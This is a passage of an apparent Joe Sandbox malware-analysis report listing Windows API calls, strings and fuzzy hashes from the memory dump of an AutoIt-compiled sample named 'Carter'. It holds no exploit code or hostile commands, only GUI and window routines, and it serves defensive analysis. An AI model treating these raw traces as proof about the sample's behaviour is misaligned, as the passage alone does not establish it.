                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 002FA0F7
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 002FA1B0
                                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 002FA1CC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: 0
                                                                            • API String ID: 2326795674-4108050209
                                                                            • Opcode ID: 5f91e829c8c84e58b016fc5a82a48e5e3041c6ced40b8830a0a1ced7785b4271
                                                                            • Instruction ID: 5b8179f05dff53530b49c9b2ea882e5066282928c8b1226138447bad36c5c2af
                                                                            • Opcode Fuzzy Hash: 5f91e829c8c84e58b016fc5a82a48e5e3041c6ced40b8830a0a1ced7785b4271
                                                                            • Instruction Fuzzy Hash: 8102E2B012820AAFD715CF18C858BBAFBE5FF45384F04852DFA99962A0C775D864CF52
                                                                            APIs
                                                                            • GetSysColor.USER32(00000012), ref: 002FAF51
                                                                            • SetTextColor.GDI32(?,?), ref: 002FAF55
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 002FAF6B
                                                                            • GetSysColor.USER32(0000000F), ref: 002FAF76
                                                                            • CreateSolidBrush.GDI32(?), ref: 002FAF7B
                                                                            • GetSysColor.USER32(00000011), ref: 002FAF93
                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 002FAFA1
                                                                            • SelectObject.GDI32(?,00000000), ref: 002FAFB2
                                                                            • SetBkColor.GDI32(?,00000000), ref: 002FAFBB
                                                                            • SelectObject.GDI32(?,?), ref: 002FAFC8
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 002FAFE7
                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002FAFFE
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 002FB013
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002FB05F
                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 002FB086
                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 002FB0A4
                                                                            • DrawFocusRect.USER32(?,?), ref: 002FB0AF
                                                                            • GetSysColor.USER32(00000011), ref: 002FB0BD
                                                                            • SetTextColor.GDI32(?,00000000), ref: 002FB0C5
                                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 002FB0D9
                                                                            • SelectObject.GDI32(?,002FAC1F), ref: 002FB0F0
                                                                            • DeleteObject.GDI32(?), ref: 002FB0FB
                                                                            • SelectObject.GDI32(?,?), ref: 002FB101
                                                                            • DeleteObject.GDI32(?), ref: 002FB106
                                                                            • SetTextColor.GDI32(?,?), ref: 002FB10C
                                                                            • SetBkColor.GDI32(?,?), ref: 002FB116
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                            • String ID:
                                                                            • API String ID: 1996641542-0
                                                                            • Opcode ID: b3e2f8f1484a145baf10e2c34d0317613d945a115e7262dde596c05141d9b83d
                                                                            • Instruction ID: 3ad68f0b4ab8fddf38d3b5463be7e492eab4452f0e555749f147ddf1b00075e4
                                                                            • Opcode Fuzzy Hash: b3e2f8f1484a145baf10e2c34d0317613d945a115e7262dde596c05141d9b83d
                                                                            • Instruction Fuzzy Hash: 26617071911219AFDF169FA4DC48FAEBB79FF08320F104226FA15AB2A1D7719950CF90
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 002F90EA
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002F90FB
                                                                            • CharNextW.USER32(0000014E), ref: 002F912A
                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 002F916B
                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 002F9181
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002F9192
                                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 002F91AF
                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 002F91FB
                                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 002F9211
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 002F9242
                                                                            • _memset.LIBCMT ref: 002F9267
                                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 002F92B0
                                                                            • _memset.LIBCMT ref: 002F930F
                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002F9339
                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 002F9391
                                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 002F943E
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 002F9460
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002F94AA
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002F94D7
                                                                            • DrawMenuBar.USER32(?), ref: 002F94E6
                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 002F950E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                            • String ID: 0
                                                                            • API String ID: 1073566785-4108050209
                                                                            • Opcode ID: 4a4c7df826174760696ced523058216abd0ec1ac03fc2feb71b3fcd781d4d865
                                                                            • Instruction ID: f909ccdc3298df7353a2445bc21fbb15424cae2962c944707e783667c7caa8d8
                                                                            • Opcode Fuzzy Hash: 4a4c7df826174760696ced523058216abd0ec1ac03fc2feb71b3fcd781d4d865
                                                                            • Instruction Fuzzy Hash: 08E18F7091020DABDF219F54CC84FFEBBB9EF05790F40816AFA15AA191DB718AA1CF50
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 002F5007
                                                                            • GetDesktopWindow.USER32 ref: 002F501C
                                                                            • GetWindowRect.USER32(00000000), ref: 002F5023
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 002F5085
                                                                            • DestroyWindow.USER32(?), ref: 002F50B1
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002F50DA
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002F50F8
                                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 002F511E
                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 002F5133
                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002F5146
                                                                            • IsWindowVisible.USER32(?), ref: 002F5166
                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 002F5181
                                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 002F5195
                                                                            • GetWindowRect.USER32(?,?), ref: 002F51AD
                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 002F51D3
                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 002F51ED
                                                                            • CopyRect.USER32(?,?), ref: 002F5204
                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 002F526F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                            • String ID: ($0$tooltips_class32
                                                                            • API String ID: 698492251-4156429822
                                                                            • Opcode ID: d4db152e1dbfe54e3cbae16639080eff9356c7b2d567521c72f98af655be280d
                                                                            • Instruction ID: fdbe93debe676239ec77191d270b1153b55c1ed746eeb8cb70dbe63f0dacd6eb
                                                                            • Opcode Fuzzy Hash: d4db152e1dbfe54e3cbae16639080eff9356c7b2d567521c72f98af655be280d
                                                                            • Instruction Fuzzy Hash: A2B18870224715AFD704DF64C844B6BFBE5EF88350F008A2DFA999B291DB71E815CB92
                                                                            APIs
                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 002D499C
                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 002D49C2
                                                                            • _wcscpy.LIBCMT ref: 002D49F0
                                                                            • _wcscmp.LIBCMT ref: 002D49FB
                                                                            • _wcscat.LIBCMT ref: 002D4A11
                                                                            • _wcsstr.LIBCMT ref: 002D4A1C
                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 002D4A38
                                                                            • _wcscat.LIBCMT ref: 002D4A81
                                                                            • _wcscat.LIBCMT ref: 002D4A88
                                                                            • _wcsncpy.LIBCMT ref: 002D4AB3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                            • API String ID: 699586101-1459072770
                                                                            • Opcode ID: 57c51830adf9be4b3c181f16abefbec611dcd6f641443f9616d6a9b8ce6e353e
                                                                            • Instruction ID: 32a17a598e77993feae8fb6c87dc7f84144fc432d4bdb616f35f6287df83d48d
                                                                            • Opcode Fuzzy Hash: 57c51830adf9be4b3c181f16abefbec611dcd6f641443f9616d6a9b8ce6e353e
                                                                            • Instruction Fuzzy Hash: 7F413872A21305BBEF15FB608C47EBF776CEF41710F00001BF905A6192EB749E219AA5
                                                                            APIs
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00272C8C
                                                                            • GetSystemMetrics.USER32(00000007), ref: 00272C94
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00272CBF
                                                                            • GetSystemMetrics.USER32(00000008), ref: 00272CC7
                                                                            • GetSystemMetrics.USER32(00000004), ref: 00272CEC
                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00272D09
                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00272D19
                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00272D4C
                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00272D60
                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00272D7E
                                                                            • GetStockObject.GDI32(00000011), ref: 00272D9A
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00272DA5
                                                                              • Part of subcall function 00272714: GetCursorPos.USER32(?), ref: 00272727
                                                                              • Part of subcall function 00272714: ScreenToClient.USER32(003377B0,?), ref: 00272744
                                                                              • Part of subcall function 00272714: GetAsyncKeyState.USER32(00000001), ref: 00272769
                                                                              • Part of subcall function 00272714: GetAsyncKeyState.USER32(00000002), ref: 00272777
                                                                            • SetTimer.USER32(00000000,00000000,00000028,002713C7), ref: 00272DCC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                            • String ID: AutoIt v3 GUI$h0
                                                                            • API String ID: 1458621304-2022682891
                                                                            • Opcode ID: d30b079c12bc27dc2125cc54b4fe5ed7a18360c1b31a6abbf280d7e9f84ab1cf
                                                                            • Instruction ID: 30475209418d41b1be6a38ffa196948c24c1d8198370dbe4ea585b680728cbf9
                                                                            • Opcode Fuzzy Hash: d30b079c12bc27dc2125cc54b4fe5ed7a18360c1b31a6abbf280d7e9f84ab1cf
                                                                            • Instruction Fuzzy Hash: BEB1707161420ADFDB15DFA8DD95BAD7BB8FB08310F10812AFA19A7290DB74A860CF54
                                                                            APIs
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            • GetForegroundWindow.USER32(00300980,?,?,?,?,?), ref: 002904E3
                                                                            • IsWindow.USER32(?), ref: 002C66BB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Foreground_memmove
                                                                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                            • API String ID: 3828923867-1919597938
                                                                            • Opcode ID: 724508a4f3c4c257e27e66d8095df2b24622659165d2fedd2a011f992f4a03fa
                                                                            • Instruction ID: 068ba87b421310da97a56f4d9aeaa4351f13941f364ffcae09d11cf63d2a712d
                                                                            • Opcode Fuzzy Hash: 724508a4f3c4c257e27e66d8095df2b24622659165d2fedd2a011f992f4a03fa
                                                                            • Instruction Fuzzy Hash: 62D190301256069FCB08EF60C485BAABBB9FF54344F204A1DF495575A2DB30E9B9CF92
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 002F44AC
                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002F456C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharMessageSendUpper
                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                            • API String ID: 3974292440-719923060
                                                                            • Opcode ID: b03b86eb2cde493976a2e89378a51ae6e02e26409ae9dfcc751e6ba0fd46dfdc
                                                                            • Instruction ID: 2eef624e86430ece766e44e35806661bac6156841cc76d3cbacc7b1ff0270d33
                                                                            • Opcode Fuzzy Hash: b03b86eb2cde493976a2e89378a51ae6e02e26409ae9dfcc751e6ba0fd46dfdc
                                                                            • Instruction Fuzzy Hash: 8AA14C342342199FCB14FF20C851A7AB3A5EF89354F108968A9969B2D2DBB0ED25CF51
                                                                            APIs
                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 002E56E1
                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 002E56EC
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 002E56F7
                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 002E5702
                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 002E570D
                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 002E5718
                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 002E5723
                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 002E572E
                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 002E5739
                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 002E5744
                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 002E574F
                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 002E575A
                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 002E5765
                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 002E5770
                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 002E577B
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 002E5786
                                                                            • GetCursorInfo.USER32(?), ref: 002E5796
                                                                            • GetLastError.KERNEL32(00000001,00000000), ref: 002E57C1
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                            • String ID:
                                                                            • API String ID: 3215588206-0
                                                                            • Opcode ID: 34875ede037afda29b2faa3d3f721b2ce889e57f556bae1341e20ceba2f74b94
                                                                            • Instruction ID: 83a78e3f6bdc9b5c6b98a1efdda5dee8e56e189331ee50aca22a91a6c4f3d858
                                                                            • Opcode Fuzzy Hash: 34875ede037afda29b2faa3d3f721b2ce889e57f556bae1341e20ceba2f74b94
                                                                            • Instruction Fuzzy Hash: 2E417370E54319AADB109FBA8C49D6EFFF8EF41B10F10452FE109E7290DAB8A500CE51
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 002CB17B
                                                                            • __swprintf.LIBCMT ref: 002CB21C
                                                                            • _wcscmp.LIBCMT ref: 002CB22F
                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 002CB284
                                                                            • _wcscmp.LIBCMT ref: 002CB2C0
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 002CB2F7
                                                                            • GetDlgCtrlID.USER32(?), ref: 002CB349
                                                                            • GetWindowRect.USER32(?,?), ref: 002CB37F
                                                                            • GetParent.USER32(?), ref: 002CB39D
                                                                            • ScreenToClient.USER32(00000000), ref: 002CB3A4
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 002CB41E
                                                                            • _wcscmp.LIBCMT ref: 002CB432
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 002CB458
                                                                            • _wcscmp.LIBCMT ref: 002CB46C
                                                                              • Part of subcall function 0029385C: _iswctype.LIBCMT ref: 00293864
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                            • String ID: %s%u
                                                                            • API String ID: 3744389584-679674701
                                                                            • Opcode ID: 8d6aff1c3f2a991ad5e055fa8ea88a9a8d2b5e531c9f35b694d2d044436c68ff
                                                                            • Instruction ID: 8d3b3db7d607bce23f3ad5ccdcf5a58a50f4ee90d2b788f8d8c5a1438cbac0da
                                                                            • Opcode Fuzzy Hash: 8d6aff1c3f2a991ad5e055fa8ea88a9a8d2b5e531c9f35b694d2d044436c68ff
                                                                            • Instruction Fuzzy Hash: DCA1F171224207AFDB1ADF64C896FAAB7E8FF44314F00461EF999C2191DB30E965CB91
                                                                            APIs
                                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 002CBAB1
                                                                            • _wcscmp.LIBCMT ref: 002CBAC2
                                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 002CBAEA
                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 002CBB07
                                                                            • _wcscmp.LIBCMT ref: 002CBB25
                                                                            • _wcsstr.LIBCMT ref: 002CBB36
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 002CBB6E
                                                                            • _wcscmp.LIBCMT ref: 002CBB7E
                                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 002CBBA5
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 002CBBEE
                                                                            • _wcscmp.LIBCMT ref: 002CBBFE
                                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 002CBC26
                                                                            • GetWindowRect.USER32(00000004,?), ref: 002CBC8F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                            • String ID: @$ThumbnailClass
                                                                            • API String ID: 1788623398-1539354611
                                                                            • Opcode ID: 1892468e3525d6c91354d771f07af624ed946f6c8b67c4c10648b565d8e43e1a
                                                                            • Instruction ID: d5ab54016a100831596e5fd156f86513d6cd51969b8540b58253bf8b6a489cea
                                                                            • Opcode Fuzzy Hash: 1892468e3525d6c91354d771f07af624ed946f6c8b67c4c10648b565d8e43e1a
                                                                            • Instruction Fuzzy Hash: AA81A07102420A9FDB06DF14C886FAA77ECEF44314F04866EFD899A096DB30DE65CB61
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                            • API String ID: 1038674560-1810252412
                                                                            • Opcode ID: 12da1cd2f74c4718a4e0febc8e98b668b57a2f83d3fc00f18cb3c778c18852b2
                                                                            • Instruction ID: 164a7b32c0d728e3ac5e796581ec2884ce41a431097f089ff020a77a99d2952f
                                                                            • Opcode Fuzzy Hash: 12da1cd2f74c4718a4e0febc8e98b668b57a2f83d3fc00f18cb3c778c18852b2
                                                                            • Instruction Fuzzy Hash: F431E034A60616A7DB06FAA0ED03FED73A8AF20750F200229F541B10D6EF616E348E56
                                                                            APIs
                                                                            • LoadIconW.USER32(00000063), ref: 002CCBAA
                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002CCBBC
                                                                            • SetWindowTextW.USER32(?,?), ref: 002CCBD3
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 002CCBE8
